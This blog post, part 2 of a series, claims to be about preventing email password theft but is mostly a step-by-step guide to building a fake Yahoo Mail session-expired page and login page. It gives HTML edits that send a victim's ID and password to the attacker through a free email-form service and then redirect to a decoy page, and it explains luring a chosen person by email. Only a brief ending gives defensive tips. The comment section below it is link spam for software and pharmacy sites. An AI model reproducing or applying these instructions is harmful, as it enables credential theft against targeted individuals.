Learn to prevent your email password being hacked (part 2)
We need to modify the code of the 2 pages from the first part of this post. For the first page I'd recommend you delete all of the scripts. Here is the code without the scripts in it. Now we need to change the bottom left link that says Re-login to Yahoo! Mail. For that look in your source code and locate the line :
<a href="http://mail.yahoo.com/?.done=http%3a%2f%2fus.f396.mail.yahoo.com%2fym%2flogin" target=_top>Re-login to Yahoo! Mail</a>
All you need to do is switch the address to the URL of your second page. For that you will need to think ahead and establish what will it be on your website. So the above line should look something like that:
<a href="http://login_page.yourdomain.com" target=_top>Re-login to Yahoo! Mail</a>
That's all there is to do about the first page so let's move on to the second page (login page) where there is much to cover.
Locate the line:
<p class="yreglgsb"><input type="submit" name=".save" value="Sign In"></p>
This is the code for the Sign In button. We need to change this to redirect the person i want his/her email password cracked to my pictures page. It should look like this:
<p class="yreglgsb"><input type="button" name=".save" value="Sign In" onclick="window.location.href='url'" </p>
where the url has to be the one from your pictures page.
Locate the line:
<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form">.
This line marks what will happen to whatever the user inputs in the two fields on the right screen (if you look at the page in a web browser), the Yahoo! ID and the password fields. For now, when someone enters something in those two fields and click on the Sign In button, it tells yahoo to search database and authenticate them. We need to change that so that it will send to our email whatever the user inputs there. We have 2 possibilities to do that. First would be to use a website that offers free email forms and second choice would be to get help from a php file that will trigger sending the email to your email address.
In the first case, if you want to use a website that offer free email forms, i would recommend that you will take a look on the www.bravenet.com website, for it is a great website with many resources that will help you understand better html and also offers free website hosting. There is a little disadvantage in using this method. If you apply for a free membership whenever you will use their service it will first take you to a confirmation page, which is annoying and will ruin every one's plan on finding someone else email password using the method I'm presenting. I have searched for more then 2 hours on the Internet a website that will host free email forms without demanding something in exchange (like links, banners etc). But if you consider updating your account with them, you will be able to use their service without having to place a link to your website right under the form, or a banner or something else that would ruin everything. If you are not that concerned about that, i will continue on detailing what exactly needs to be done using bravenet.com service. I have registered for a free account and i applied for an email form (contact form), and then i went for the "get the html code" for it. Now, if you take a look at the first 3 lines from the generated code
<form method="post" enctype="multipart/form-data" action="http://pub19.bravenet.com/emailfwd/senddata.php">
<input type="hidden" name="usernum" value="xxxxxxxxxx">
<input type="hidden" name="cpv" value="2">
xxxxxxxxxx has to be your id when you registered with bravenet. its a 10 digits number and you will have your own when you register.
you will see the first line looks a little bit like the code line we talked about earlier, the one that submits the yahoo Id and the password to yahoo for authentication. So if you go back to the source code of the second page (the login page) and once more locate the line
<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form">
you will see they have the <form> tag in common. You need to replace this line with the 3 lines generated by bravenet for the email form and you are good to go. This is a reminder: after you load the new login page in a web browser and you will input the yahoo id and the password, right after you click the Sign In button, it will redirect you on bravenet website for a page that will ask you to confirm the data that will be send to your email. This email service from bravenet is very nice, and will also provide you some other information like the ip of the computer, which is a great to know where did the person you wanted his/her email revealed to you has fallen into the trap (if i may say so). So that confirmation page will pretty much ruin every one's plan and the person that will input their id and password will be redirected to that page, and they will find it very fishy. So, once again if you want the best of it, you might consider upgrading your account and then you will have the option of not being redirected to that annoying page. In case none of them works out for you, you can try get help from php to have the same process done, but this requires you to verify that your web host allows php. I will talk about including your php files on your website and test them on your local machine in my next post.
Now, to summarize it all, you should have a website that contains:
main page= session_expires page with the re-login to Yahoo! Mail link changed to your second page
second page = login page with the Sign In button that will direct you to the pictures page
third page = pictures page
They all should have different URL's.
All there is left to do would be the compose an email that will have the link to the main page attached. When someone will want to see your new pictures it will first access the main page ( the one with the session expires), that person will think it was somehow disconnected from yahoo and will try to login again using the Re-login to Yahoo! Mail link. The person will be directed to the login page, will enter the yahoo id and password and when he/she will click on the Sign In button an email with the inputted id and password will be send to your email address and in the same time it will load the pictures page.
This is a method that can be countered very easily. And all the people out there reading my blog should know how to do this. The whole post brings me to this part where i will tell people that anyone can have his/her email password jacked with a simple method like the one i presented. You never know when someone will want to do this, and it's best to be aware of this kind of methods so you will know how to keep your email safe and your privacy safer.
Yahoo should never take you on that session expired page unless you have been inactive for more then 24 hours, or if your cookies are not enabled on your computer, or if you access multiple yahoo accounts at the same time.
Most people do not check out always the link bar located on the upper part of your browser.Here is an example. The eye is fixed on the contents of the web page and we often do not look up there to see the links. Emails are not always safe so you should definitely always check out the links whenever you open an email that has a link attached to it. I know that when you receive an email from a person you know and has a link attached to it, you tend to trust that person and open the link without doubts, but you may never know for sure what is behind it.
In case your session from yahoo somehow expires this is the link you should see on your browser after you click on the re-login to Yahoo! Mail link. I have talked mostly about yahoo emails, but this applies to all the email hosts out there.
So stay on guard, and keep your emails just for yourself !
Link to the 1st part of this post
7 comments:
Try to look for the answer to your question in google.com
njabulo death of a son ebook http://audiobooksworld.co.uk/Chaos-Theory/c1602/ how to publish an ebook [url=http://audiobooksworld.co.uk/es/E-J/m32526/]free ebook guitar[/url] la llama doble ebook
[url=http://audiobooksworld.co.uk/Criticism-and-Theory/c1681/?page=5][img]http://audiobooksworld.co.uk/image/6.gif[/img][/url]
best voice audio software http://buyoemsoftware.co.uk/fr/category-100-107/Programmation-et-laboration shadow warrior 2 software [url=http://buyoemsoftware.co.uk/product-37294/TweakNow-RegCleaner-Professional-4-0]best recipe software review[/url] compressed video software
[url=http://buyoemsoftware.co.uk/de/category-200-210/Internet]Internet - Download OEM, Software Sale, OEM Software[/url] yaesu vx 829 programming software
[url=http://buyoemsoftware.co.uk/de/category-10/Internet?page=2][img]http://buyoem.co.uk/image/6.gif[/img][/url]
government contractors software http://buysoftwareonline.co.uk/de/product-36887/PremiumSoft-Navicat-Premium-Enterprise-Edition-10-0 accounting for software publishers [url=http://buysoftwareonline.co.uk/product-11851/Rumba-Utilites-4-0]best scanner and software[/url] opensource business card software
[url=http://buysoftwareonline.co.uk/category-100-111/System-Tools?page=5]System Tools - Software Store[/url] option wise anaylis software
[url=http://buysoftwareonline.co.uk/fr/category-3/Graphiques-et-Publication?page=3][img]http://buyoem.co.uk/image/6.gif[/img][/url]
gps map software navman http://buysoftwareonline.co.uk/category-13/Music-Software?page=5 acounting software with multi currency [url=http://buysoftwareonline.co.uk/it/product-37209/MetaProducts-Flash-and-Media-Capture-1-4]xp utilities software[/url] dsp oem software
[url=http://buysoftwareonline.co.uk/category-200-214/Other?page=2]Other - Cheap Legal OEM Software, Software Sale, Download OEM[/url] share accounting software
[url=http://buysoftwareonline.co.uk/category-4/Software-Plugins][img]http://buyoem.co.uk/image/3.gif[/img][/url]
[url=http://certifiedpharmacy.co.uk/catalogue/i.htm][img]http://onlinemedistore.com/4.jpg[/img][/url]
non prescription online pharmacy http://certifiedpharmacy.co.uk/products/evecare.htm pharmacy order prescription recieved [url=http://certifiedpharmacy.co.uk/products/valtrex.htm]prosperity specialty pharmacy[/url]
millineuom pharmacy systems http://certifiedpharmacy.co.uk/products/abana.htm canadian pharmacy provigil [url=http://certifiedpharmacy.co.uk/products/hair-loss-cream.htm]hair loss cream[/url]
pharmacy certification http://certifiedpharmacy.co.uk/products/levitra-professional.htm recept pharmacy 8th avenue fort worth [url=http://certifiedpharmacy.co.uk/products/lasuna.htm]employment pharmacy technician[/url]
the pharmacy act australia http://certifiedpharmacy.co.uk/products/roxithromycin.htm us discount pharmacy ambien [url=http://certifiedpharmacy.co.uk/products/ed-discount-pack-2.htm]ed discount pack 2[/url]
[url=http://englandpharmacy.co.uk/products/zerit.htm][img]http://onlinemedistore.com/5.jpg[/img][/url]
pharmacy accreditation acpe interim report http://englandpharmacy.co.uk/products/cefadroxil.htm flower mound herbal pharmacy [url=http://englandpharmacy.co.uk/products/furosemide.htm]clinic pharmacy durham nc[/url]
albertsons pharmacy http://englandpharmacy.co.uk/products/fludac.htm rowlands pharmacy [url=http://englandpharmacy.co.uk/products/acticin.htm]acticin[/url]
picture of retail pharmacy http://englandpharmacy.co.uk/products/chloroquine.htm blue sky pharmacy [url=http://englandpharmacy.co.uk/products/cardizem.htm]risperdal online pharmacy[/url]
the board of pharmacy protects http://englandpharmacy.co.uk/products/eulexin.htm ward road pharmacy [url=http://englandpharmacy.co.uk/products/ampicillin.htm]ampicillin[/url]
Post a Comment